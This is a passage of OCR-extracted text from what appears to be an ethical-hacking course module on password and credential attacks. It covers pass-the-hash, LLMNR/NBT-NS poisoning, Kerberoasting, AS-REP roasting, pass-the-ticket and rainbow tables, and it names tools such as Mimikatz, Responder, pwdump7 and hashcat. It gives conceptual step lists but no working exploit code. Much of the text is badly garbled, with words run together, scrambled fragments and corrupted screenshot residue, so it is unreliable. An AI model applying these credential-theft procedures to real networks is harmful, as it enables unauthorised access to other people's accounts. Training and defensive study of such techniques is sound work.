HashInjection/Pass-the-Hash (PtH)
attack
Attack
usingTolan/spyware/keylogger

Thistypeof attackis possiblewhenthe targetsystem usesa hashfunctionas partofthe

authenticationprocess to authenticateits users. Generally,
the systemstores hash
valuesof the credentialsin the SAM database/fileon a Windowscomputer. In such
the server computes
‘cases, the hashvalueof the user-submittedcredentialsor allows
the user to inputthehashvaluedirectly, Theserver thenchecks it againstthe stored
hashvaluefor authentication.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ED)
mean Berroa
>

‘User
computer
Figure620:
Hash
injection attack
artacer

‘Attackersexploit suchauthenticationmechanisms andfirst exploitthe targetserver to

retrieve the hashesfrom the SAMdatabases. Theythen inputthe hashesacquired
directly into the authenticationmechanism to authenticatewith the user’s
stolenpre
computed hashes,Thus,in a hashinjection/PtH attack,the attackersinject a
compromised LanMan(LM) of NTLMhashinto a localsession andthen use the hashto
authenticateto the network resources. Anyserver or service (running on Windows,
UNIX, or any other OS) using NTLMor LM authenticationis susceptible to this attack.
Thisattackcan belaunched on any0S,butWindows couldbe more vulnerable owingto
its Single-Sign-On (SSO) featurethat stores passwords insidethe systemand enables
usersto accessallthe resourceswith a one-time login.
Differenttechniques are usedto perform a hashinjection/Pth attack:
© Theattackertries to compromise adminprivileges to capture cachevaluesof the
user'spassword hashes fromthe localuser account database or SAM. However,

thisapproachof
offline usage these cachedhashesc an berestrictedbythenetworkadmin.Hence,
maynot always befeasible.
Theattackerdumps the password hashesfrom the localuser account databaseor
SAM to retrieve password hashes
oflocalusers,andgainsaccessto adminaccounts
to compromise otherconnected systems.
Theattackercaptures LM or NTLMchallenge-response messages betweentheclient
to
andserver extract encrypted hashes through brute-forcing,
Theattackerretrieves thecredentialsof localusers as well as thosebelonging to the
security domain fromtheWindowsIsass.exe process.
Thehackercarries out thisattackbyimplementing the followingfive steps:
©. Thehackercompromisesone workstation/server using a local/remoteexploit.
Thehacker extracts storedhashes usingtoolssuchas pwdump7, Mimikatz,etc. and

a
finds domainadmin
account
hash.
The hackeruses tools suchas Mimikatzto place one of the retrievedhashes in
his/her local Isass.exe processandthen uses the hashto logon to any system
{domain controller) with the samecredentials.
Thehackerextracts all the hashesfromthe ActiveDirectory databaseandcan now
any
‘compromise account i n thedomain.

ical andCountermensores
Mackin ©by E-Comel
Copyright
LLMNR/NBT-NS
Poisoning
LLMINR LocalMulticastNameResolution)
(Link andNBT-NS NameService)
(NetBIOS are
main elements
‘two of WindowsOSsusedto performname resolution
for hostspresent
on the same link.Theseservicesare enabledbydefaulti n WindowsOSs.
When the ONS server fails to resolve name queries, the host performs an
unauthenticated UDPbroadcast asking all the hostsif anyonehas a name that it is
looking for.Asthe hosttryingto connect is following a n unauthenticatedandbroadcast
process, it becomes easyforan attackerto passivelylistento a networkfor LLMINR(UDP
port 5355)and NBT-NS(UDPport 137)broadcastsand respond to the request
pretending to be a targethost.After accepting a connection with a host,the attacker
can utilizetoolssuchas Responder.py or Metasploit to forwardthe request to a rogue
server (forinstance, to perform
TCP:137) an authentication process
During the authentication process,the attacker sendsan NTLMv2hashto the rogue
server, whichwas obtainedfrom the host tryingto authenticateitself. Thishash is
storedi n a diskandcan becracked usingofflinehash-cracking toolssuchas hashcat or
Johnthe Ripper. Oncecracked,thesecredentialsc an beusedto login andgainaccessto
the legitimate hostsystem
involvedi n LLMNR/NBT-NS
Steps poisoning:
1. Theuser sendsa requestto connect to the data-sharing \\DataServer,
system, which
shemistakenlytypedas \\DtaServr.

responds
The\\DataServer to the user, sayingthat it doesnot knowthehostnamed
\\OtaServr.
The user then performs
a LLMNR/NBT-NS
broadcastto find out if anyonei n the
networkknowsthe hostname\\DtaServr.
to the user sayingthat it is \\DataServer,
The attackerreplies the
accepts user
NTLMv2 hash,andresponds to the user
with
an error.

cumin
2

\oeasene―
WoFOUN

Atacte responds
vying
thot be hows WDSc

6.11: UMNR/NBT-NS
Figure poisoningattack

ical andCountermensores
Mackin ©by E-Comel
Copyright
 LUMNR/NBT-NS Tools
Poisoning
© Responder
Source:https://github.com

(NetBIOS
responds
isan
Responder LLMINR,
NameService)
NBT-NS, andMDNSpoisoner.It responds to specific
queriesbasedon their name suffix.Bydefault,
to a File Server Service request,
NBT-NS
the tool only
which is for SMB. As showni n the
screenshots,
attackersuse the Responder tool to extract informationsuchas the
targetsystem’s
OSversion, clientversion, NTLMclientIP address, NTLMusername,
andpassword
hash.

vbuntu@ubuntu:~/Responder
-1
(Responder.9yens

Figure6.12; of Responder
Screenshot

6
Module P3g0577 ical
and ©
Mackin Countermensores
Copyright
by E-Comel
 ubuntu@ubuntu:
~/Responder

Figure613:
Screenshot showing
oftheoutputof Responder NTLMhashes
Internal MonologueAttack
Theinternalmonologue attackis similarto the attackperformedusingMimikatz, except
thatthememoryarea of the LocalSecurity Authority SubsystemService(LSASS) process
is not dumped, thereby avoiding WindowsCredentialGuardandantivirus. Mimikatzis a
post-exploitation tool, throughwhich attackerscan extract plaintext passwords,
Kerberos tickets,andNTLMhashes fromLSASS processmemory. Attackersuse Mimikatz
to retrieve user credentialsfromLSASS processmemory,andtheacquired information
helps themin performing lateralmovement i n the post-exploitation
phase.
internal monologue
‘An attack is usually
performed i n a secure environment where
Mimikatzcannot be executed.In this attack, using the Security Support Provider
Interface(SSP) from a user-modeapplication, a local procedure call to the NTLM
authenticationpackageis invokedto calculate
the NetNTLMresponsein the context of
the logged-on
user.

to
Steps perform
an internalmonologue

1. Theattacker
disables
attack:
controlsof NetNTLMv1bymodifying
thesecurity thevaluesof
LMCompatibilityLevel,
NTLMMinClientSec,andRestrictSendingNTLMTraffic.
attackerextracts allthe non-networklogon
‘The tokensfromall the active processes
to as legitimate
masquerade users,

6
Module S78
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
 Now,the attackerinteracts with NTLMSSPlocally,
foreachmasqueraded user to
‘obtain
user,
a NetNTLMV1 responseto thechosenchallenge
i n the security
context that
of
Now, the attacker restores NTLMMinClientSec,
LMCompatibilityLevel, and
RestrictSendingNTLMTraffic
to theiractualvalues.
Theattacker
usesrainbowtables theNTLMhashofthecaptured
to crack responses.
Finally,
theattackerusesthecrackedhashesto gainsystem-level
access,

Qn
Sentosa een
nee
emeeeh
ct

Cracking
Kerberos
6.14:Depiction
Figute
Password
of
internalmonologue
attack

Kerberos
is the most commonly
usedauthenticationprotocol for networkentities. Due
widespread
to its it is susceptible
acceptance, to various attacks.Attackershave
developed andexploit
various waysto hackinto Kerberos its vulnerabilities
to crack
weak passwords, injectmaliciouscodes, and obtain informationabout the network
infrastructureand various network entities. AttackerstargetKerberosauthentication
protocolin two commen ways: namely, cracking the TGS,knownas Kerberoasting,
and
the TGT,knownas AS-REP
cracking Roasting
(Cracking
Roasting
AS-REP TGT)
In this attack,attackersrequest an authenticationticket (TGT) fromthe KOCi n the
form of an AS-REQ packet. If the user account exists,the KDCreplies with a TGT
encrypted with the account'scredentials.This allows attackersto receive an
encrypted ticket,whichcan then be savedofflineandfurthercrackedto obtainthe
password. Attackerscan perform this typeof attackboth actively and passively.In
an active scenario,attackers generate an AS-REP message for the user, whereasi n a
passivescenario,attackersobservean AS-REP message.
In Kerberosauthentication, the pre-authentication modeis enabledbydefaultandis
designed to prevent offlinepassword-guessing attacks.Therefore, to perform an AS.
REPRoasting attack, attackersmust identify user accountswith pre-authentication
mode disabled, i.e., the user account must be set to "Do not require Kerberos
authentication.―Attackersuse tools suchas Rubeusto perform AS-REP roasting
attacks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 following
‘The Roasting:
stepsare involvedi n AS-REP
1. The attacker identifies a user account with the pre-authentication
option
disabled.
Onbehalfoftheuser, theattackerrequests ticket(TGT)
an authentication from
thedomaincontrolleror KOC.
domaincontrollerverifiesthe user account andreplies
‘The with a TGT encrypted
with theaccount's
credentials
Theattackerstores the TGToffline,
and cracksit to extract the user account
passwordand furtheraccessthenetworkentity
(here, the applicationserver).

Aeplcation

AS-REP
Figure6.15: Roasting
1gTGS)
Inthis attack, requesta TGSforthe service principal
attackers name (SPN)of the
targetservice account.Thisrequest is madeto thedomaincontrollerbyusinga valid
domainuser'sauthentication ticket(TGT).Thedomain controller doesnot haveany
records;if the user hasaccessed the networkresources,
it just searches
the SPNi n
the Active Directory, with a n encrypted
and further replies ticket usinga service
account linked with SPN.The typeof encryption usedfor the requested service
ticket (ST)is RC4_HMAC_MDS, whichindicatesthat for encrypting
the ST,the NTLM
password hashis used.To crackthe ST,attackersexportthe TGSticketsfrom
memory and save them offline to the local system. Furthermore, attackersuse
differentNTLMhashesto crackthe STand,o n successfully cracking it, the service
account password can be discovered.Attackersuse tools suchas Kerberoastto
perform attacks
Kerberoasting o n Kerberos
authentication.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Thefollowing
stepsare involvedi n Kerberoasting
a n authenticationticket (TGT)
1. Onbehalfof a user,the attackerrequests from
‘the
domaincontrolleror KOC.
verifiesthe user account andreplies
The domaincontroller with an encrypted
Ter.
Witha validuser authenticationticket(T6T),
the attackerrequests
the TGS
Thedomaincontroller
verifies
theTGTandreplies
Theattackerstores the TGSticket offline,
witha
TGS
ticket.
and cracksit to extract the service
account passwordandfurther access the networkentity(here, the application
server).

Domain
controter/KOC

pepiication

Figure
6.16:Kerberoastng
Pass-the-Ticket
Attack
Pass-the-ticket is a technique usedfor authenticating a user to a system that is using
Kerberos ticketswithout providing password.
the user’s Kerberosauthenticationallows
users to access services provided byremote servers without the need to provide
passwords for every requested service. To perform this attack,the attackerdumps
Kerberos ticketsof legitimate accountsusingcredentialdumping tools.
ATGT or STcan becaptured basedon the levelof access permitted to a client.Here, the
STpermitsaccessto specific resources, andtheTGTis usedto senda request to theTGS

ST
for the to access all the services theclienthasbeenauthorizedto access,
SilverTicketsare captured for resources that use Kerberos for the authentication
process,andcan beusedto create ticketsto call a specific service andaccessthe system

the
thatoffers service.
Goldenticketsare captured forthedomainwiththe KDSKRBTGT NTLMhashthat allows
the creation of TGTsfor any profilei n the Active Directory.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 launchpass-the-ticket
‘Attackers attackseitherbystealing theST/TGT froman end-user
machineand usingit to disguise themselves as a valid user, or bystealing
the ST/TGT
froma compromised AS.Afterobtaining one of thesetickets, an attacker
can gain
unauthorizedaccess to the networkservices andsearchfor additionalpermissionsand
criticaldata.
Attackersuse tools suchas Mimikatz,Rubeus,WindowsCredentialsEditor,etc. to
launchpass-the-ticket
attacks:
© Mimikatz
Source:https://github.com
Mimikatzallowsattackersto passKerberos TGTto othercomputersandsigni n using
the victim'sticket.Thetool alsohelps plaintext
i n extracting passwords, hashes,PIN
codes,and Kerberosticketsfrom memory.It is an open-source tool that enables
anyoneto see and store authenticationdatasuchas Kerberos
tickets,Attackerscan
leverage thisfor privilege
escalation
andcredentialstealing.

of
Sereenshot Mimikatz
Figure 6.17;

ical andCountermensores
Mackin ©by E-Comel
Copyright
 OtherActive Online Attacks

OtherActive Online Attacks

=
CombinatorAttack
In a combinatorattack,
attackerscombinethe entries of the first dictionary
with those
oftheseconddictionary.
Theresultantlistof entries can beusedto produce
full names
and compound words.Attackersuse this wordlistto cracka password
on the target
systemandgainunauthorizeda ccessto thesystemfiles.
Steps
involvedin a combinatorattack:
©

©
Finda valid
Build your
target
user.
own two dictionariesor downloadtwo differentwordlistdictionaries
fromonlinesources
Createa final wordlistbymergingentries of two separatedictionaries.Forexample,
if the first dictionary
contains 100 words, and the seconddictionary contains 70
words, thenthe merged dictionary
contains 100x 70 = 7000words.
Useautomatedtools,suchas hashcat,
to crackthe password of the targetuser.
perform
‘Attackers thistypeof password
crackingi n a situation wherea randomphrase

Fingerprint
Attack
as
ofwordsis used a defaultpassword
generationprocedure.

In a fingerprint
attack,
the passphrase
is brokendown into fingerprints
consistingof
single-and multi-character
combinationsthat a targetuser might
choosea s his/her
password. For example, for a word ‘password’,
this technique
would create

ical andCountermensores
Mackin ©by E-Comel
Copyright
 “p’,
“a―,
perform
usually "w",
"x", “wo",
fingerprints "s","s",
etc, "0", “a,
thisattackto crackcomplex
"pa", "ss",
passwords
“xd,Attackers
suchas "pass-10'

this
attack,
To perform
password
hashdatabase,
attackerscreate a listof uniquepassword
andthenperform
a brute-force
hashes
froma leaked
attackto obtaina wordlistand
further attack
fingerprint
startthe
Attack
PRINCE
PRobability
‘A INfinite ChainedElements(PRINCE) attackis an advancedversion of a
combinatorattack i n which, insteadof taking inputsfrom two differentdictionaries,
use
a dictionary
attackers single input
chainof words.For example,
to buildchainsof combinedwords.Thischaincan
havebetween1 andn wordsfromthe inputdictionary
if the length
concatenatedtogether
of charactersto be guessed
to forma
is 5, then the
following
combinations are created fromthe inputdictionary:
S-letter
word
3-letterword+ 2letter word
letter word + 3-letterword
letter word + 4-letterword
ete
Toggle-Case
Attack
In a toggle-case
attack,attackerstry all possibleupper-caseand lower-case
of a word presenti n the input dictionary.
combinations For example,
if a word i n the
inputdictionary thefollowing
is “xyz―, set ofcombinations
is generated:
xyz
xyz
xyz
xyz,
xyz

ete
Thesuccess
©
rate
of
IFusersuse
thisattackis lowfor the following
upper-case letters,
reasons:

theyeither use it i n the first place

or in betweenthe
word
numberof upper-case
In other cases,the users use a lower or equal lettersthan
lower-case letters
‘Markov-Chain
Attack
In Markov-chainattacks,
attackersgather databaseandspliteachpassword
a password
entry into two- and three-charactersyllables
(2-grams
and 3-grams);
using these

ical andCountermensores
Mackin ©by E-Comel
Copyright
 a new alphabet
characterelements, is developed,
whichis thenmatchedwith the
existingpassword
database.
phase
In the initial of this attack, attackersset a threshold parameter for the
occurrencesof the elements, and onlythe letters presenti n the new alphabet
that
at least the minimum numberof times are selected.Furthermore,
‘occurred this
techniquecombinesthe selectedletters into wordswith a maximum length of eight
andthena dictionary
characters, attackis performed password.
to crackthe target

ical andCountermensores
Mackin ©by E-Comel
Copyright
 PassiveOnline Attacks:Wire Sniffing

rafthe to
record
network
(©Attackers sniffertoolson
run packet localares network (LAN) access
‘and therw
(©Thecaptured suchas passwords

and
data mayinclude
senttiveinformation
{FTPloginsessions, ee) emails
(©-Sritfed
credentials
ae sed to i n unauthorized
acces tothe targetsytem

Wire Sniffing
Complex Computationally *\\ Hard to Perpetrate

of pay
|
PassiveOnline Attacks:Man-in-the-Middleand Replay
Attacks
C/EH
(©inane

andtheserver
attack,
thecommunication
to
theattacker
channels
extract
acquires
between
access to
thevitim
theinformation
nended
iceakiderstions

Relatively
hardto perpetrate
(©na eplayaac, packets
ave captured
and authentication
tokens
a sife. Afterthe relevant
Must betrustedbyone or
sides
both

informations
extracted,
ae
using
thetokens placed back Cansometimes by
bebroken
fon thenetwork to gainaccess levaldating
wae

Passive
=
Online
Wire Sniffing
Attacks

Packetsniffing
is a formof wire sniffing in whichhackers
or wiretapping sniffcredentials
during
transit bycapturing Attackersrarely
Internetpackets. to perform
use sniffers this
typeof attack.With packet
sniffing,
an attackercan gainpasswords to applications
such
as email,
websites,SMB,FTP,rlogin
sessions,or SQL.As sniffersrun i n the background,
the victim remains unaware
ofthe
sniffing,

6
Module PageS86 ical andCountermensores
Mackin Copyright
©
by E-Comel
 sree

{Assniffersgather packets at thedatalinklayer, theycan graball the packets on the LAN

of the machinerunning the snifferprogram. Thismethodis relatively hardto perpetrate
andcomputationally complicated. Thisis becausea networkwith a hubimplements a
broadcastmediumthat all systems shareon the LAN.TheLANsendsthe data to all
machines connected to it. If an attacker
runs a sniffer
on one system on the LAN, he/she
can gather

sniffers,
data sent to andfrom any other system
tools are ideally
as they
of
o n the LAN.Themajority sniffer
suitedto sniffdata i n a hubenvironment.Thesetools are passive
passively wait for datatransferbeforecapturing the information.They
are efficient at imperceptibly gatheringdata from the LAN, The captured data may
includepasswords sent to remote systems during FTP,rloginsessions,and electronic
mail.The attackeruses thesesniffedcredentialsto gain unauthorizedaccess to the
targetsystem, Thereare a varietyof toolsavailableon the Internet for passivewire
sniffing,
andReplay
‘Man-in-the-Middle Attacks
Whentwo partiesare communicating, 2 man-in-the-middle(MITM) attackcan take
place,
i n which a third partyinterceptsa communication betweenthe two parties
withouttheirknowledge. Thethird partyeavesdrops
on the trafficand thenpassesit
along.
Todo this,the “man
simultaneously.
i n the middle―
In an MITM attack, the attacker of
hasto snifffrombothsides the connection
acquiresaccessto the communication
channelsbetweenthe victim andserver to extract the information.Thistypeof attackis
oftenusedin telnetandwireless technologies. It is not easyto implement suchattacks
to the TCPsequence
‘owing numbersandthe speed of the communication.Thismethod
is relatively andcan sometimes bebrokenbyinvalidating
hardto perpetrate thetraffic.

Ina replay attack,

619:Mainin-the-midle
Figure
packets
and
reply
attacks
andauthenticationtokensare captured usinga sniffer.After
the tokensa re placed
the relevantinfo is extracted, backon the networkto gainaccess.
Theattackerusesthis typeof attackto replay bank transactionsor similartypesof data
transfer,in the hope of replicating
and/or altering
activities,suchas banking deposits or
transfers.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 OfflineAttacks:RainbowTableAttack

sano
prcnnas
bea st

Offline Attacks: Distributed Network Attack

(©
ADstrbutedNetwork
protected
filesusing Attack across
theunused
{ONA)
the
i used
technique forrecovering
powerofmachines
processing
fromhashes
passwords or password!
network

‘The coordinatesthe
DNAManager
attackportion
nd allocates
small ofthekey
s earch
to machines
tat

‘The
ONAClient runs

inthe
background onyunusedprocessor
consuming tine

‘The combines
program
crackthepassword the capabitlsofl the dents connectedtothe networkanduses
processing it to

Offline Attacks
the validity
Offlineattacksoccur whentheintruderchecks of passwords. observeshow
He/she
the password
is stored.If the usernames and passwords
are stored i n a readablefile,it
becomes
easyforthe attackerto gainaccessto the system.
Hence,
it is important
to protect
thelistof passwords
and keep encrypted.
form,preferably
i t i n an unreadable

ical andCountermensores
Mackin ©by E-Comel
Copyright
 although
Offlineattacks, are successful
time-consuming, dueto their smallkeyspace
andshort
length.
Notably,
‘Two examples
techniques
on
the
differentpassword-cracking
of offlineattacksare as follows:
are available Internet

1. Rainbow
2.
table
Distributed
attack
NetworkAttack
=

Table
Rainbow Attack
rainbowtableattackuses the cryptanalytic
‘A time-memory trade-offtechnique,which
requireslesstime thanother techniques. It usesalready-calculated
information stored
i n memory to crackthe encryption.In the rainbowtable attack,
the attackercreates a
table ofall the possible andtheirrespective
passwords hashvalues,
knownas a rainbow
table,i n advance.

RainbowTable:A rainbowtable is a precomputed table that contains word listslike

dictionary filesand brute-forcelistsandtheir hashvalues.It is a lookup table specially
usedin recoveringa plaintext password from a ciphertext. Theattackeruses thistable
to look forthe password andtries to recover it frompassword hashes
Computed Hashes: Anattackercomputes the hashfor a list of possible passwords and
compares it to the pre-computed hashtable (rainbow table). If attackersfind a match,
theycan crackthe password.
Compare the Hashes:Anattackercaptures the hashof a password andcompares it with
theprecomputed hashtable.If amatchis found, thenthepassword is cracked.
It is easy
to recover passwords bycomparing captured password hashesto the pre-computed
tables.
Examples
of pre-computed
hashes:

1gqazwed
hhO21da 0
»4259ec34599c530b28a6a8£2254668590
744171 6cb£Bd4dd0£
£4ce31a177151
SdaBdast +» 3ed696a8571a843cda453a229d741843
sodifo8st ¢744b171
6cb£8d4dd0f
igure6.20:Pre-computed
hashes
£4ce31a177151

Toolto Create RainbowTables:rtgen

Source:http://project-rainbowerack.com
RainbowCrackis a general-purpose
implementationthat takesadvantage of the time~
memory trade-offtechnique
to crackhashes.
Thisprojectallowsyou to cracka hashed
password.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Attackersuse the rtgentool of this projectto generate
the rainbow tables.As showni n
the screenshot,the rtgenprogram needsseveralparameters to generate a rainbow
table,
Thesyntax of thecommand
line is:
Syntax:rtgen hash_algorithm
plaintext_len max
table min
charset plaintext_len
index chain_lenchain_num
part_index

Figure621:
utedNetworkAttack
A Distributed NetworkAttack(DNA) is a technique used for recoveringpassword
protected filesthat utilizethe unusedprocessingpower of machines spreadacrossthe
networkto decrypt passwords. In this attack,the attackerinstalls a DNA manageri n a
centrallocationwheremachines
DNA managercoordinates
machines
clients
runningDNA
the attackand assigns
distributedthroughout
can accessit over a network.The
smallportionsof the keysearchto
the network.TheDNAclient runs in the background,
onlytaking the processor time that was unused.Theprogramcombines the processing
capabilities of all the clientsconnectedto the network and uses it to crackthe
password. Attackersuse the Password Recovery Toolkit(PRTK),whichis equipped with
DNAtools,to perform thisattack

©.
ofa and
Thefeatures

Easily
reads
DNAare as follows:

graphs
statistics
©. Addsuser password
dictionariesto cracka
© Optimizes
password forspecific
attacks languages

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Modifies
the user dictionaries
Comprises
stealthclientinstallationfunctionality
Automatically
updates clientwhileupdating theDNAserver
DNAcan beclassified
into two modules:
DNA
Server
‘The
Interface
DNAserver interfaceallowsusersto manageDNAfroma server. TheDNAserver
moduleprovides the user with the status of all the jobsthat the DNA server is
containsthefollowing
Theinterface
executing, jobs’
* Thecurrent jobqueueconsistsofall thejobs
CurrentJobs: addedto the list by
the controller.Thecurrent joblist hasmany columns,suchas the identification
numberassigned bythe DNAto the job,the name of the encrypted file,the
user'spassword, the passwordthat matchesa keythat can unlockthe data, the
status
ofthe
job, other
and various columns.
FinishedJobs:Thefinishedjoblist provides informationaboutthe decryption
jobs,including the password. It alsohasmanycolumnsthat are similarto the
current joblist. Thesecolumnsincludethe identificationnumberassigned by
DNAto the job,the name of the encrypted file,the decrypted
pathof the file,
the keyusedto encrypt and decrypt the file,the dateand time that the DNA
server startedworking on the job,the date and time the DNAserver finished
working on the job,the elapsed time,ete.
DNA ClientInterface
Userscan use the DNAclientinterface frommanyworkstations. Theinterfacehelps
the client statisticsto coordinateeasily
and is availableon machines
with the pre-
installedDNAclientapplication. Thereare severalcomponents, suchasthe name of
the DNAclient, the name of the group to whichthe DNAclient belongs, and the
statisticsaboutthecurrent job.
NetworkManagement
TheNetworkTrafficdialog
boxaidsi n the discoveryof the networkspeedthe DNAuses
and each work-unitlength the work-unitlength,
of the DNA client. Using a DNA client
‘can

at
DNAserver the beginning theof
workwithout contacting DNAserver. TheDNA
andend the work-unitlength. client contact
application
can the

Theuser can monitor the jobstatus queueandDNA. Aftercollecting thedatafromthe

NetworkTrafficdialog box,the user can modify the client’s
work.Whenthe size of the

speed
length
‘work-unit
of
increases,thespeed the networktrafficdecreases.
of the traffic leadsthe client working
time. Therefore,
on the jobsto spend
the user can makefewer requests
A decrease
longer
i n the
amounts of
to the server becauseof the

of
reductionin the bandwidth network traffic.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 PasswordRecovery
Tools

Eloonsoft
Distributed
Passwordassord
Recovery Recovery Toit

Soames
hey,an
rong eneypton nls 9 prc nena,

PasswordRecovery
Tools
Passwordrecovery tools allow attackersto break complex
passwords,
recover strong
andunlockseveral
keys,
encryption documents.
=
_Elcomsoft
Distributed
Password
Recovery
Source:https://www.elcomsoft.com
The ElcomsoftDistributedPasswordRecoveryapplication
allowsattackersto break
complex passwords, keys,and unlockdocumentsi n a
recover strongencryption
production
environment.
Attackerscan use this tool to recover the passwordsof the targetsystemto gain
unauthorizeda ccess
tothefiles
critical andothersystem
software.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 622; Screenshotof Eleomsol
Figure OistributedPassword Recovery

Someofthe password
recoverytoolsare listedas follows:
Password Recovery Toolkit(https://accessdata.com)
=
Passware (https://www.passware.com)
Kit Forensic
+
hashcat(https://hashcat.net)
Windows Tool(https://www.windowspasswordsrecovery.com)
Recovery
Password
(hetps://www.top-password.com)
PCUnlocker

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Toolsto Extractthe PasswordHashes
pwdump7 ‘Tools
to Extractthe
‘Password
Hashes
(©

the
Security
Account
pwdump?
from
(SAM)of
extractsLM and NTLMpasswordhashes lca
Manager database
use accounts
Minka
(heps://habs.com)

(heps//athub.com)
Dstneals Powershell
(eo //itbubscom)
Nedoaract
(h95//ihubs
com)

Tools to Extractthe PasswordHashes

Thefollowing
toolscan beusedto extract the password
hashesfromthe targetsystem:
=
pwdump7
Source:https://www.tarasco.org
pwdump7 that dumps
is an application the password functions
hashes(one-way or
OWFs) SAMdatabase.pwdump
from NT’s extracts LM and NTLMpassword hashesof
localu ser accountsfromthe Security
AccountManager (SAM) database.Thisapplication
cr tool runs byextracting
the binary
SAMandSYSTEM file fromthe filesystem,
andthen
extracts the hashes.Oneof the most powerfulfeaturesof pwdump7 is that it is also
capable of dumping protected
files. Pwdump7can also extract passwordsoffline by
selecting
of
thetargetfiles.Theuse this programrequires administrative
the remote system,
privileges on

ical andCountermensores
Mackin ©by E-Comel
Copyright
 shownin thescreenshot,
‘As attackersuse thistool to extract password
hashes
fromthe
targetsystem,

Figure6.2:Sreesho of pwd?
toolsto extract password
Someoftheadditional hashes
are asfollows:
+
Mimikate(https://github.com)
+
Empire
Powershell (https://aithub.com)
+
DSinternals (https://github.com)
PowerShell
=
(https://aithub.com)
Ntdsxtract
privileges
Note:Theuse ofthe abovetoolsrequiresadministrative on the remote system,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 i}
and ophcrackCEH
Tools:LOphtCrack
Password-Cracking
Lophcacisa
Lophtcrack| jesewors
tcl
ad |]
cover
devenedtoset
apkstons gphcrack| onrantow tals eames wih Gopal

Password-Cracking
Tools

RainbowCrack
|
rainbow
tblshoses [BEetone
tmememory toner

hasheat

Password-Cracking
Tools
tools allow you to reset unknownor lost Windowslocal administrator,
Password-cracking
domainadministrator, In the case of forgotten
andother user account passwords. passwords,
it
even allowsusers instant without reinstalling
access to their locked computer Windows.
Attackerscan use password-cracking
toolsto crackthe passwords
of the target
system.

Module
6 596
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
 toolsare listedas follows.
Somepassword-cracking
=
Lophtcrack
Source:https://www.lOphtcrack.com
LophtCrackis a tool designedto audit passwords and recover applications.
It recovers
lostMicrosoftWindowspasswords hybrid,
with the helpof a dictionary, rainbowtable,
andbrute-forceattacks,andit alsochecks the strength
of the password.
shownin the screenshot,
‘As attackers u se LOphtCrackto crackthe password of the
targetto gainaccessto the system.

Figure6.24;
of
Screenshot
Lophtcrack

Module
6 597
Page ical
and
Mackin
‘AEN ©
Reserve.
Promote
Countermensores by E-Comel
Copyright
Reproduction
Sty
=
opherack
Source:http://ophcrack.sourceforge.net
opherack
is a Windowspassword-cracking
tool that uses rainbowtablesfor cracking
passwords.
It comes with a graphical
Linux/UNIX,
Windows,
as etc.
(GUI)
user interface andruns on different such
OSs
showni n the screenshot,
‘As attackersuse ophcrack
to perform
brute-forceattacksand
crackpassword
hashes
ofthetargetsystem.

of opherack
Figure625:Screenshot

ical andCountermensores
Mackin ©by E-Comel
Copyright
 =
RainbowCrack
Source:http://project-rainbowerack.com
RainbowCrack
crackshasheswith rainbowtables, using a time-memory trade-off
algorithm.
A traditionalbrute-force
cracker
cracks
hashi n a manner that is different
from that followed bya time-memory-tradeoff hashcracker.Thebrute-forcehash
cracker plaintexts
tries all possible one afterthe otherduring cracking.In contrast,
RainbowCrack pre-computesall the possible plaintext
hashpairs i n the selectedhash
algorithm, andplaintext
charset, lengthi n advance andstoresthemi n a “rainbowtable
file. It maytakea longtime to pre-compute the tables,
but once the pre-computation is
finished,
‘As
itis
possible
easily ciphertext
to
shownin the screenshot,
tables.
andquickly crackthe in the rainbow
the password
to crack
attackersuse RainbowCrack hashes
of the targetsystem.

hantoncrce

srosetoe
6aesarb73es947e0c089c0
arasetoe
6aesa1b73eS947e0c089c0
Administrator
Guest

69os31673e5967e0c089c0
rosewood
AscasroisnsisstesidesT2ss0o4et
Defoutdecount

FA
<notound> stout Adin

PA 17070665
sepe7aa07daseetaetia2eode87e

rinesra479
apple
2dr02S2a47ONSSedGeI7EIGESbL—gwesty
Main
dato
2

Messoges
esr
oevso4se0837o2a82807973000537
west ES

Plait
of
2025204
RGEC
Query GSIBESDe

‘ome
disk
alam of
of
hain
hash&rede
averse:
ead
clelaton 1510400,

of
umber
Derlomance afehanaver:
155343,
280mlions

Fre 6.26:Screens ofRainbowCrack

Somepassword-cracking
toolsare listedas follows:
*
Johnthe Ripper
(https://www.openwall.com)
=
hashcat(https://hashcat.net)
+
(httpsy//aithub.com)
THC-Hydra
(http://foofus.net)
Medusa

ical andCountermensores
Mackin ©by E-Comel
Copyright
 PasswordSalting

salting
\@ Password isa technique
wherea randomstring
ofcharacters
are added
to the
beforecalculating
password the hashes

(©Advantage; makesi t more difficultt o reverse thehashes

Salting and defeatpre-computed
hashatacks

Alicerootbsef21
6051
iGad303c024a85176080701380) =~

sobirootadedta:3282abd0208323eF0340de7292e34030 ferent hs

$485
ecittoot:209be1 303739134761de075e0387ae08)~

PasswordSalting
salting
Password is a technique
i n whichrandomstrings
of characters
are addedto a password
beforecalculating
the hashes.
Thismakesi t more difficultto thehashes andhelps
reverse in
defeating
pre-computedhashattacks.Thelonger
the randomstring,the harderit becomesto
breakor crackthe password.
The randomstringof characters
shouldbe a combination of
alphanumericcharacters,
In cryptography, consistsof randomdata bitsusedas an inputto a one-way function,
a “salt―
the otherbeinga password. Insteadof passwords,
of
the output the one-wayfunction
storedand usedto authenticateusers. A saltcombineswith a password
functionto generatea keyfor use with a cipher or othercryptographic
algorithm.
can be
bya keyderivation
This
technique differenthashesfor the same password,
generates whichrenderspassword
cracking
difficult.
Alice:root:baef21 Sbad303ce24a83Te0317608de020I38d
password Same but

Cecil:root:209be
1
aitorent
rashes
due
Bob:root:a9c4fa:3282abd0308323¢f0349dc7232c349ac
Citerent
salts
4835303¢23af34761de02be038ide08)
4
to

of password
Example
Figure6.27: salting
Note: Windowspassword
hashes
a re not salted,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 How to Defendagainst
PasswordCracking
Usean securty
information auditto monitorandtrack password
attacks

sallow use
&
ofthesame pasword during
password
change

Disallowthe use

Donot use cleartext

that
of pasword
